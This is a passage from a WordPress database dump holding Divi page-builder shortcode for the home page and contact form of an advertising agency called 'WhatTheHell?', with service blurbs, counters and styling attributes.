background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 20:46:30','2020-08-07 20:46:30','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(637,1,'2020-08-07 20:49:41','2020-08-07 20:49:41','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" 